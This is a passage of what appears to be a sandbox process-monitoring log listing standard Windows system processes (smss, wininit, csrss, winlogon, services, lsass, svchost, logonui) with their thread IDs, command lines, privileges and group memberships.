os_tid = 0x1b8 Thread: id = 448 os_tid = 0x1d4 Process: id = "32" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x1fea9000" os_pid = "0x154" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 424 os_tid = 0x158 Process: id = "33" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x1eb5b000" os_pid = "0x15c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x124" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 425 os_tid = 0x160 Thread: id = 427 os_tid = 0x174 Thread: id = 428 os_tid = 0x178 Thread: id = 440 os_tid = 0x1a4 Thread: id = 441 os_tid = 0x1a8 Thread: id = 442 os_tid = 0x1b4 Thread: id = 457 os_tid = 0x1f4 Thread: id = 505 os_tid = 0x2b4 Process: id = "34" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x1ea5a000" os_pid = "0x168" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x154" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 429 os_tid = 0x16c Thread: id = 430 os_tid = 0x180 Thread: id = 431 os_tid = 0x184 Thread: id = 432 os_tid = 0x188 Thread: id = 433 os_tid = 0x18c Thread: id = 439 os_tid = 0x1a0 Thread: id = 451 os_tid = 0x1d8 Thread: id = 452 os_tid = 0x1dc Process: id = "35" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x1ee60000" os_pid = "0x190" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x154" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 438 os_tid = 0x194 Thread: id = 445 os_tid = 0x1cc Thread: id = 446 os_tid = 0x1d0 Thread: id = 510 os_tid = 0x2c4 Process: id = "36" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1f2db000" os_pid = "0x1ac" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 447 os_tid = 0x1b0 Thread: id = 466 os_tid = 0x20c Thread: id = 467 os_tid = 0x210 Thread: id = 468 os_tid = 0x214 Thread: id = 469 os_tid = 0x218 Thread: id = 470 os_tid = 0x21c Thread: id = 471 os_tid = 0x220 Thread: id = 472 os_tid = 0x224 Thread: id = 473 os_tid = 0x228 Thread: id = 474 os_tid = 0x22c Thread: id = 475 os_tid = 0x230 Thread: id = 476 os_tid = 0x234 Thread: id = 491 os_tid = 0x270 Process: id = "37" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x1f6e7000" os_pid = "0x1bc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 449 os_tid = 0x1c0 Thread: id = 453 os_tid = 0x1e0 Thread: id = 454 os_tid = 0x1e4 Thread: id = 455 os_tid = 0x1e8 Thread: id = 456 os_tid = 0x1ec Thread: id = 458 os_tid = 0x1f0 Thread: id = 459 os_tid = 0x1f8 Thread: id = 460 os_tid = 0x1fc Thread: id = 461 os_tid = 0x200 Thread: id = 463 os_tid = 0x204 Thread: id = 464 os_tid = 0x208 Process: id = "38" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x1f9ee000" os_pid = "0x1c4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 450 os_tid = 0x1c8 Thread: id = 478 os_tid = 0x240 Thread: id = 507 os_tid = 0x2b8 Thread: id = 508 os_tid = 0x2bc Thread: id = 511 os_tid = 0x2c8 Thread: id = 512 os_tid = 0x2cc Thread: id = 513 os_tid = 0x2d0 Thread: id = 515 os_tid = 0x2d8 Thread: id = 518 os_tid = 0x2e4 Thread: id = 520 os_tid = 0x2ec Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1ba52000" os_pid = "0x238" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006fa1" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 477 os_tid = 0x23c Thread: id = 479 os_tid = 0x244 Thread: id = 480 os_tid = 0x248 Thread: id = 481 os_tid = 0x24c Thread: id = 482 os_tid = 0x250 Thread: id = 483 os_tid = 0x254 Thread: id = 484 os_tid = 0x258 Thread: id = 485 os_tid = 0x25c Thread: id = 486 os_tid = 0x260 Thread: id = 488 os_tid = 0x264 Thread: id = 489 os_tid = 0x268 Thread: id = 490 os_tid = 0x26c Thread: id = 493 os_tid = 0x278 Thread: id = 495 os_tid = 0x284 Thread: id = 496 os_tid = 0x288 Thread: id = 498 os_tid = 0x290 Process: id = "40" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1d887000" os_pid = "0x27c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b612" [0xc000000f], "LOCAL" [0x7] Thread: id = 494 os_tid = 0x280 Thread: id = 497 os_tid = 0x28c Thread: id = 499 os_tid = 0x294 Thread: id = 500 os_tid = 0x298 Thread: id = 501 os_tid = 0x29c Thread: id = 502 os_tid = 0x2a0 Thread: id = 503 os_tid = 0x2a4 Thread: id = 504 os_tid = 0x2a8 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1d294000" os_pid = "0x2ac" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b8f1" [0xc000000f], "LOCAL" [0x7] Thread: id = 506 os_tid = 0x2b0 Thread: id = 509 os_tid = 0x2c0 Thread: id = 514 os_tid = 0x2d4 Thread: id = 516 os_tid = 0x2dc Thread: id = 517 os_tid = 0x2e0 Process: id = "42" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x1a23f000" os_pid = "0x2f0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x190" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 521 os_tid = 0x2f4